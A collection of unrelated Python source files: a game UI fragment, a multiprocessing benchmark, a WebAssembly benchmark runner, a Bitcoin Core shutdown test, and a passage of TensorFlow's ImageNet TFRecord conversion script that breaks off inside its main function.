        required_purchase = 'games.easter_egg_hunt'
    else:
        required_purchase = None
    if (tournament_button is None and required_purchase is not None
            and not _ba.get_purchased(required_purchase)):
        if _ba.get_account_state() != 'signed_in':
            show_sign_in_prompt()
        else:
            PurchaseWindow(items=[required_purchase])
        return
    self._save_state()

    # For tournaments, we pop up the entry window.
    if tournament_button is not None:
        TournamentEntryWindow(
            tournament_id=tournament_button['tournament_id'],
            position=tournament_button['button'].get_screen_space_center())
    else:
        # Otherwise just dive right in.
        assert game is not None
        if ba.app.launch_coop_game(game, args=args):
            ba.containerwidget(edit=self._root_widget,
                               transition='out_left')
def _back(self) -> None:
    """Save selection state and return to the play window."""
    # pylint: disable=cyclic-import
    from bastd.ui.play import PlayWindow
    # If something is selected, store it before leaving.
    self._save_state()
    ba.containerwidget(edit=self._root_widget,
                       transition=self._transition_out)
    window = PlayWindow(transition='in_left')
    ba.app.ui.set_main_menu_window(window.get_root_widget())
def _restore_state(self) -> None:
    """Re-select whichever widget was selected last time we were up."""
    try:
        sel_name = ba.app.ui.window_states.get(type(self),
                                               {}).get('sel_name')
        # Map stored names back to widgets; anything unrecognized
        # falls back to the scroll area.
        widgets = {
            'Back': self._back_button,
            'Scroll': self._scrollwidget,
            'PowerRanking': self._league_rank_button_widget,
            'Store': self._store_button_widget,
        }
        sel = widgets.get(sel_name, self._scrollwidget)
        ba.containerwidget(edit=self._root_widget, selected_child=sel)
    except Exception:
        ba.print_exception(f'Error restoring state for {self}.')
def _save_state(self) -> None:
    """Persist the current selection and row choices to the config."""
    cfg = ba.app.config
    try:
        sel = self._root_widget.get_selected_child()
        named_widgets = (
            (self._back_button, 'Back'),
            (self._store_button_widget, 'Store'),
            (self._league_rank_button_widget, 'PowerRanking'),
            (self._scrollwidget, 'Scroll'),
        )
        for widget, name in named_widgets:
            if sel == widget:
                sel_name = name
                break
        else:
            raise ValueError('unrecognized selection')
        ba.app.ui.window_states[type(self)] = {'sel_name': sel_name}
    except Exception:
        ba.print_exception(f'Error saving state for {self}.')
    cfg['Selected Coop Row'] = self._selected_row
    cfg['Selected Coop Custom Level'] = self._selected_custom_level
    cfg['Selected Coop Challenge Level'] = self._selected_challenge_level
    cfg['Selected Coop Campaign Level'] = self._selected_campaign_level
    cfg.commit()
def sel_change(self, row: str, game: str) -> None:
    """(internal)"""
    # Ignore selection noise until callbacks have been enabled.
    if not self._do_selection_callbacks:
        return
    if row == 'custom':
        self._selected_custom_level = game
    elif row == 'challenges':
        self._selected_challenge_level = game
    elif row == 'campaign':
        self._selected_campaign_level = game
|
mp.py | import multiprocessing as mp
import time
import os
import random
# Shared result queue (FIFO): worker processes push, the parent pops.
# NOTE(review): children see this queue only under the 'fork' start
# method; with 'spawn' (Windows/macOS default) each child re-imports the
# module and gets a fresh, disconnected Queue — verify before porting.
q = mp.Queue()
a_list = []


def worker(a_list):
    """Square each value of *a_list* and push the list of squares onto q."""
    q.put([val ** 2 for val in a_list])
if __name__ == '__main__':
    # Benchmark: square 10M random ints split across 8 processes, then
    # compare against a single-process list comprehension.
    nums = [random.randint(1, 50) for i in range(10**7)]
    chunk = len(nums) // 8  # 10**7 divides evenly by 8, so no remainder is lost
    procs = []
    t = time.time()
    for i in range(8):
        start = i * chunk
        stop = (i + 1) * chunk
        current_nums = nums[start:stop]
        p = mp.Process(target=worker, args=(current_nums,))
        procs.append(p)
        p.start()
    # Drain the queue BEFORE joining: per the multiprocessing docs, a
    # child that has put large data blocks until it is consumed, so
    # joining first could deadlock.
    results = [q.get() for i in range(8)]
    total_time = time.time() - t
    print("total time for mp", total_time)
    final_result = []
    for result in results:
        final_result += result
    total_time_cat = time.time() - t
    print("total time for mp after concat", total_time_cat)
    for p in procs:
        p.join()
    # Single-process baseline for comparison.
    t = time.time()
    result2 = [num ** 2 for num in nums]
    total_time = time.time() - t
    print("total time for list comp", total_time)
    # pid = os.getpid()
    # print(f'Main has pid {pid}')
    # p1 = mp.Process(target=worker, args=(5, 1))
    # p2 = mp.Process(target=worker, args=(15, 2))
    # p1.start()
    # p2.start()
    # print(f'first item in queue {q.get()}')
    # print(f'second item in queue {q.get()}')
# print('the list ', a_list) |
run.py | #!/usr/bin/env python3
import os
import sys
import csv
import glob
import time
import json
import logging
import resource
import threading
import subprocess
# constants ------------------------------------------------
THREADS = 1
TIMEOUT = 900
INSTR_MAX = 4000000000000000000
# globals --------------------------------------------------
dirs = glob.glob('_build/tests')
table = [['test', 'spec', 'Twasp', 'Tloop', 'Tsolver', 'paths', 'Cov']]
errors = []
# helpers --------------------------------------------------
def cmd(p, r):
    """Build the wasp command line for test file *p* with workspace *r*.

    (Was a lambda assignment — PEP 8 E731; the f-strings with no
    placeholders are also gone.)
    """
    return [
        'wasp',
        p,
        '-e',
        '(invoke "__original_main")',
        '-b',
        '-m',
        str(INSTR_MAX),
        '--workspace', r,
        '--smt-assume'
    ]
def limit_ram() -> None:
    """Cap this process's address space at 15 GiB (used as preexec_fn)."""
    fifteen_gib = 15 * 1024 * 1024 * 1024
    resource.setrlimit(resource.RLIMIT_AS, (fifteen_gib, fifteen_gib))
def run(test: str, out_dir: str):
    """Execute wasp on *test*, writing results under *out_dir*.

    Returns the combined stdout/stderr bytes, or None if the run
    crashed (non-zero exit) or timed out.
    """
    try:
        out = subprocess.check_output(
            cmd(test, out_dir),
            timeout=TIMEOUT,
            stderr=subprocess.STDOUT,
            preexec_fn=limit_ram
        )
    except (subprocess.CalledProcessError,
            subprocess.TimeoutExpired) as e:
        # Log the exception itself so crashes and timeouts are
        # distinguishable (the old bare 'crashed' message dropped it
        # and left 'e' unused).
        logging.error('crashed: %s', e)
        return None
    return out
#-----------------------------------------------------------
# main -----------------------------------------------------
# Root logger config: timestamped messages such as "12:34:56: msg".
fmt = '%(asctime)s: %(message)s'
date_fmt = '%H:%M:%S'
logging.basicConfig(format=fmt, level=logging.INFO, \
    datefmt=date_fmt)
def main(argv):
    """Run every benchmark (or only those named in *argv*) across
    THREADS worker threads and write the results to table.csv."""
    tests = []
    lock = threading.Lock()

    def run_benchmark(test):
        # Run one test, then fold its report.json into the shared table.
        out_dir = os.path.join('output', os.path.basename(test))
        t0 = time.time()
        run(test, out_dir)
        delta = time.time() - t0
        report_file = os.path.join(out_dir, 'report.json')
        if not os.path.exists(report_file):
            # No report on disk means the run crashed or timed out.
            lock.acquire()
            errors.append(test)
            lock.release()
            logging.info(f'Crashed/Timeout {os.path.basename(test)}')
            return
        with open(report_file, 'r') as f:
            try:
                report = json.load(f)
            except json.decoder.JSONDecodeError:
                # NOTE(review): 'i' here resolves via closure to main's
                # thread-spawn loop variable, not this worker's id —
                # confirm the intended value.
                logging.info(f'Thread {i}: Can not read report \'{report_file}\'.')
                return
        if not report['specification']:
            # NOTE(review): failing specs are recorded as errors but
            # still fall through and get a table row below — confirm
            # this double-recording is intended.
            lock.acquire()
            errors.append(test)
            lock.release()
        logging.info(f'Test {os.path.basename(test)} ' \
                     f'({report["specification"]}, ' \
                     f'T={round(delta,2)}s, L={float(report["loop_time"])}, S={float(report["solver_time"])}' \
                     f'{report["paths_explored"]})')
        lock.acquire()
        table.append([
            f'{test}',
            report['specification'],
            round(delta, 2),
            float(report['loop_time']),
            float(report['solver_time']),
            report['paths_explored'],
            report['coverage']
        ])
        lock.release()

    def t_loop(i):
        # Worker loop: pop tests under the lock until the list is empty.
        while True:
            try:
                lock.acquire()
                test = tests.pop()
            except IndexError:
                break
            finally:
                lock.release()
            run_benchmark(test)

    if argv == []:
        for dir in dirs:
            tests = tests + glob.glob(f'{dir}/*.wat')
    else:
        tests = argv
    threads = []
    for i in range(THREADS):
        t = threading.Thread(target=t_loop, args=(i,))
        threads.append(t)
        t.start()
    for t in threads:
        t.join()
    # Dump accumulated results and any failures.
    with open('table.csv', 'w', newline='') as f:
        writer = csv.writer(f)
        writer.writerows(table)
    for err in errors:
        logging.info('Failed Test: ' + err)
# CLI entry: forward args (minus the program name) to main().
if __name__ == '__main__':
    main(sys.argv[1:])
#-----------------------------------------------------------
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test bitcoind shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
    """Issue a blocking waitfornewblock RPC and verify its reply."""
    reply = node.waitfornewblock()
    assert_equal(reply['height'], 0)
class ShutdownTest(BitcoinTestFramework):
    """Check bitcoind shuts down cleanly while an RPC is still in flight."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1
        self.supports_cli = False

    def run_test(self):
        # Dedicated proxy with a long timeout so the blocking call below
        # doesn't time out client-side.
        node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
        # Force connection establishment by executing a dummy command.
        node.getblockcount()
        # Start the long-running waitfornewblock on a background thread.
        Thread(target=test_long_call, args=(node,)).start()
        # Wait until the server is executing the above `waitfornewblock`
        # (2 = that call plus this getrpcinfo call itself, presumably).
        self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
        # Wait 1 second after requesting shutdown but not before the `stop` call
        # finishes. This is to ensure event loop waits for current connections
        # to close.
        self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
build_imagenet_data.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
  """Wrapper for inserting int64 features into Example proto."""
  # Accept a scalar or a list; the proto always wants a list.
  values = value if isinstance(value, list) else [value]
  return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def _float_feature(value):
  """Wrapper for inserting float features into Example proto."""
  # Accept a scalar or a list; the proto always wants a list.
  values = value if isinstance(value, list) else [value]
  return tf.train.Feature(float_list=tf.train.FloatList(value=values))
def _bytes_feature(value):
  """Wrapper for inserting bytes features into Example proto."""
  bytes_list = tf.train.BytesList(value=[value])
  return tf.train.Feature(bytes_list=bytes_list)
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
                        height, width):
  """Build an Example proto for an example.

  Args:
    filename: string, path to an image file, e.g., '/path/to/example.JPG'
    image_buffer: string, JPEG encoding of RGB image
    label: integer, identifier for the ground truth for the network
    synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
    human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
    bbox: list of bounding boxes; each box is a list of integers
      specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
      the same label as the image label.
    height: integer, image height in pixels
    width: integer, image width in pixels
  Returns:
    Example proto
  """
  # Transpose the per-box [xmin, ymin, xmax, ymax] lists into four
  # per-coordinate lists, as the Example proto stores them columnwise.
  xmin, ymin, xmax, ymax = [], [], [], []
  for box in bbox:
    assert len(box) == 4
    xmin.append(box[0])
    ymin.append(box[1])
    xmax.append(box[2])
    ymax.append(box[3])

  feature = {
      'image/height': _int64_feature(height),
      'image/width': _int64_feature(width),
      'image/colorspace': _bytes_feature('RGB'),
      'image/channels': _int64_feature(3),
      'image/class/label': _int64_feature(label),
      'image/class/synset': _bytes_feature(synset),
      'image/class/text': _bytes_feature(human),
      'image/object/bbox/xmin': _float_feature(xmin),
      'image/object/bbox/xmax': _float_feature(xmax),
      'image/object/bbox/ymin': _float_feature(ymin),
      'image/object/bbox/ymax': _float_feature(ymax),
      # Every box carries the image-level label.
      'image/object/bbox/label': _int64_feature([label] * len(xmin)),
      'image/format': _bytes_feature('JPEG'),
      'image/filename': _bytes_feature(os.path.basename(filename)),
      'image/encoded': _bytes_feature(image_buffer),
  }
  return tf.train.Example(features=tf.train.Features(feature=feature))
class ImageCoder(object):
  """Helper class that provides TensorFlow image coding utilities.

  Builds three small TF graphs (PNG->JPEG, CMYK JPEG->RGB JPEG, JPEG decode)
  once, and runs them through a single shared Session per call.
  """

  def __init__(self):
    # Create a single Session to run all image coding calls.
    self._sess = tf.Session()

    # Initializes function that converts PNG to JPEG data.
    self._png_data = tf.placeholder(dtype=tf.string)
    image = tf.image.decode_png(self._png_data, channels=3)
    self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)

    # Initializes function that converts CMYK JPEG data to RGB JPEG data.
    # channels=0 lets the decoder pick up the native channel count.
    self._cmyk_data = tf.placeholder(dtype=tf.string)
    image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
    self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)

    # Initializes function that decodes RGB JPEG data.
    self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
    self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)

  def png_to_jpeg(self, image_data):
    """Re-encode a PNG byte string as JPEG bytes."""
    return self._sess.run(self._png_to_jpeg,
                          feed_dict={self._png_data: image_data})

  def cmyk_to_rgb(self, image_data):
    """Re-encode a CMYK JPEG byte string as an RGB JPEG byte string."""
    return self._sess.run(self._cmyk_to_rgb,
                          feed_dict={self._cmyk_data: image_data})

  def decode_jpeg(self, image_data):
    """Decode JPEG bytes into an HxWx3 uint8 RGB array."""
    image = self._sess.run(self._decode_jpeg,
                           feed_dict={self._decode_jpeg_data: image_data})
    assert len(image.shape) == 3
    assert image.shape[2] == 3
    return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
  """Process a single image file.

  Args:
    filename: string, path to an image file e.g., '/path/to/example.JPG'.
    coder: instance of ImageCoder to provide TensorFlow image coding utils.
  Returns:
    image_buffer: string, JPEG encoding of RGB image.
    height: integer, image height in pixels.
    width: integer, image width in pixels.
  """
  # Read the image file. NOTE: must be opened in binary mode ('rb'); reading
  # JPEG bytes in text mode ('r') corrupts the data on Python 3 and on
  # Windows (newline translation).
  image_data = tf.gfile.FastGFile(filename, 'rb').read()

  # Clean the dirty data.
  if _is_png(filename):
    # 1 image is a PNG.
    print('Converting PNG to JPEG for %s' % filename)
    image_data = coder.png_to_jpeg(image_data)
  elif _is_cmyk(filename):
    # 22 JPEG images are in CMYK colorspace.
    print('Converting CMYK to RGB for %s' % filename)
    image_data = coder.cmyk_to_rgb(image_data)

  # Decode the RGB JPEG.
  image = coder.decode_jpeg(image_data)

  # Check that image converted to RGB
  assert len(image.shape) == 3
  height = image.shape[0]
  width = image.shape[1]
  assert image.shape[2] == 3

  return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
                               synsets, labels, humans, bboxes, num_shards):
  """Processes and saves list of images as TFRecord in 1 thread.

  Args:
    coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch to run index is within [0, len(ranges)).
    ranges: list of pairs of integers specifying ranges of each batches to
      analyze in parallel.
    name: string, unique identifier specifying the data set
    filenames: list of strings; each string is a path to an image file
    synsets: list of strings; each string is a unique WordNet ID
    labels: list of integer; each integer identifies the ground truth
    humans: list of strings; each string is a human-readable label
    bboxes: list of bounding boxes for each image. Note that each entry in this
      list might contain from 0+ entries corresponding to the number of bounding
      box annotations for the image.
    num_shards: integer number of shards for this data set.
  """
  # Each thread produces N shards where N = int(num_shards / num_threads).
  # For instance, if num_shards = 128, and the num_threads = 2, then the first
  # thread would produce shards [0, 64).
  num_threads = len(ranges)
  assert not num_shards % num_threads
  num_shards_per_batch = int(num_shards / num_threads)

  # Split this thread's [start, end) file range into equal per-shard
  # sub-ranges; shard_ranges holds num_shards_per_batch + 1 boundaries.
  shard_ranges = np.linspace(ranges[thread_index][0],
                             ranges[thread_index][1],
                             num_shards_per_batch + 1).astype(int)
  num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

  counter = 0
  for s in xrange(num_shards_per_batch):
    # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
    shard = thread_index * num_shards_per_batch + s
    output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
    output_file = os.path.join(FLAGS.output_directory, output_filename)
    writer = tf.python_io.TFRecordWriter(output_file)

    shard_counter = 0
    files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
    for i in files_in_shard:
      filename = filenames[i]
      label = labels[i]
      synset = synsets[i]
      human = humans[i]
      bbox = bboxes[i]

      # Read/convert the image, then serialize it as one Example record.
      image_buffer, height, width = _process_image(filename, coder)

      example = _convert_to_example(filename, image_buffer, label,
                                    synset, human, bbox,
                                    height, width)
      writer.write(example.SerializeToString())
      shard_counter += 1
      counter += 1

      # Progress heartbeat every 1000 images processed by this thread.
      if not counter % 1000:
        print('%s [thread %d]: Processed %d of %d images in thread batch.' %
              (datetime.now(), thread_index, counter, num_files_in_thread))
        sys.stdout.flush()

    writer.close()
    print('%s [thread %d]: Wrote %d images to %s' %
          (datetime.now(), thread_index, shard_counter, output_file))
    sys.stdout.flush()
    shard_counter = 0
  print('%s [thread %d]: Wrote %d images to %d shards.' %
        (datetime.now(), thread_index, counter, num_files_in_thread))
  sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
                         bboxes, num_shards):
  """Process and save list of images as TFRecord of Example protos.

  Args:
    name: string, unique identifier specifying the data set
    filenames: list of strings; each string is a path to an image file
    synsets: list of strings; each string is a unique WordNet ID
    labels: list of integer; each integer identifies the ground truth
    humans: list of strings; each string is a human-readable label
    bboxes: list of bounding boxes for each image. Note that each entry in this
      list might contain from 0+ entries corresponding to the number of bounding
      box annotations for the image.
    num_shards: integer number of shards for this data set.
  """
  assert len(filenames) == len(synsets)
  assert len(filenames) == len(labels)
  assert len(filenames) == len(humans)
  assert len(filenames) == len(bboxes)

  # Break all images into batches with a [ranges[i][0], ranges[i][1]].
  # Use the builtin int: the np.int alias was removed in NumPy 1.24+.
  spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
  ranges = []
  for i in xrange(len(spacing) - 1):
    ranges.append([spacing[i], spacing[i + 1]])

  # Launch a thread for each batch.
  print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
  sys.stdout.flush()

  # Create a mechanism for monitoring when all threads are finished.
  coord = tf.train.Coordinator()

  # Create a generic TensorFlow-based utility for converting all image codings.
  coder = ImageCoder()

  threads = []
  for thread_index in xrange(len(ranges)):
    args = (coder, thread_index, ranges, name, filenames,
            synsets, labels, humans, bboxes, num_shards)
    t = threading.Thread(target=_process_image_files_batch, args=args)
    t.start()
    threads.append(t)

  # Wait for all the threads to terminate.
  coord.join(threads)
  print('%s: Finished writing all %d images in data set.' %
        (datetime.now(), len(filenames)))
  sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
  """Build a list of all images files and labels in the data set.

  Args:
    data_dir: string, path to the root directory of images.
      Assumes that the ImageNet data set resides in JPEG files located in
      the following directory structure.
        data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
      where 'n01440764' is the unique synset label associated with these images.
    labels_file: string, path to the labels file listing one synset per line.
      Synsets are mapped to integer labels starting at 1; label 0 is reserved
      as an unused background class.

  Returns:
    filenames: list of strings; each string is a path to an image file.
    synsets: list of strings; each string is a unique WordNet ID.
    labels: list of integer; each integer identifies the ground truth.
  """
  print('Determining list of input files and labels from %s.' % data_dir)
  challenge_synsets = [l.strip() for l in
                       tf.gfile.FastGFile(labels_file, 'r').readlines()]

  labels = []
  filenames = []
  synsets = []

  # Leave label index 0 empty as a background class.
  label_index = 1

  # Construct the list of JPEG files and labels.
  for synset in challenge_synsets:
    jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
    matching_files = tf.gfile.Glob(jpeg_file_path)

    labels.extend([label_index] * len(matching_files))
    synsets.extend([synset] * len(matching_files))
    filenames.extend(matching_files)

    if not label_index % 100:
      print('Finished finding files in %d of %d classes.' % (
          label_index, len(challenge_synsets)))
    label_index += 1

  # Shuffle the ordering of all image files in order to guarantee
  # random ordering of the images with respect to label in the
  # saved TFRecord files. Make the randomization repeatable.
  # NOTE: wrap range() in list() -- on Python 3 a range object cannot be
  # shuffled in place; list() is correct on both Python 2 and 3.
  shuffled_index = list(range(len(filenames)))
  random.seed(12345)
  random.shuffle(shuffled_index)

  filenames = [filenames[i] for i in shuffled_index]
  synsets = [synsets[i] for i in shuffled_index]
  labels = [labels[i] for i in shuffled_index]

  print('Found %d JPEG files across %d labels inside %s.' %
        (len(filenames), len(challenge_synsets), data_dir))
  return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
                     image_to_bboxes):
  """Process a complete data set and save it as a TFRecord.

  Args:
    name: string, unique identifier specifying the data set.
    directory: string, root path to the data set.
    num_shards: integer number of shards for this data set.
    synset_to_human: dict of synset to human labels, e.g.,
      'n02119022' --> 'red fox, Vulpes vulpes'
    image_to_bboxes: dictionary mapping image file names to a list of
      bounding boxes. This list contains 0+ bounding boxes.
  """
  # Gather the parallel per-image lists (paths, synsets, integer labels)...
  filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
  # ...then their human-readable labels and bounding-box annotations...
  humans = _find_human_readable_labels(synsets, synset_to_human)
  bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
  # ...and write everything out as sharded TFRecord files.
  _process_image_files(name, filenames, synsets, labels,
                       humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
  """Build lookup for synset to human-readable label.

  Args:
    imagenet_metadata_file: string, path to file containing mapping from
      synset to human-readable label. Each line is formatted as
      <synset>\t<human readable label>, e.g.:
        n02119247    black fox

  Returns:
    Dictionary of synset to human labels, such as:
      'n02119022' --> 'red fox, Vulpes vulpes'
  """
  synset_to_human = {}
  for line in tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines():
    if line:
      parts = line.strip().split('\t')
      # Every non-empty line must be exactly <synset>\t<label>.
      assert len(parts) == 2
      synset_to_human[parts[0]] = parts[1]
  return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
  """Build a lookup from image file to bounding boxes.

  Args:
    bounding_box_file: string, path to file with bounding boxes annotations.
      Each line looks like:
        n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
      and parses as <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>.
      There may be multiple annotations per image file. This file is the
      output of process_bounding_boxes.py.

  Returns:
    Dictionary mapping image file names to a list of bounding boxes. This list
    contains 0+ bounding boxes.
  """
  images_to_bboxes = {}
  num_bbox = 0
  num_image = 0
  for line in tf.gfile.FastGFile(bounding_box_file, 'r').readlines():
    if not line:
      continue
    parts = line.split(',')
    assert len(parts) == 5, ('Failed to parse: %s' % line)
    filename = parts[0]
    # Coordinates arrive as [xmin, ymin, xmax, ymax] strings.
    box = [float(coord) for coord in parts[1:5]]
    if filename not in images_to_bboxes:
      images_to_bboxes[filename] = []
      num_image += 1
    images_to_bboxes[filename].append(box)
    num_bbox += 1

  print('Successfully read %d bounding boxes '
        'across %d images.' % (num_bbox, num_image))
  return images_to_bboxes
def main(unused_argv):
  """Entry point: validate shard/thread settings, then convert both splits."""
  # Each thread writes an integral number of shards, so the shard counts must
  # divide evenly by the thread count.
  assert not FLAGS.train_shards % FLAGS.num_threads, (
      'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
  assert not FLAGS.validation_shards % FLAGS.num_threads, (
      'Please make the FLAGS.num_threads commensurate with '
      'FLAGS.validation_shards')
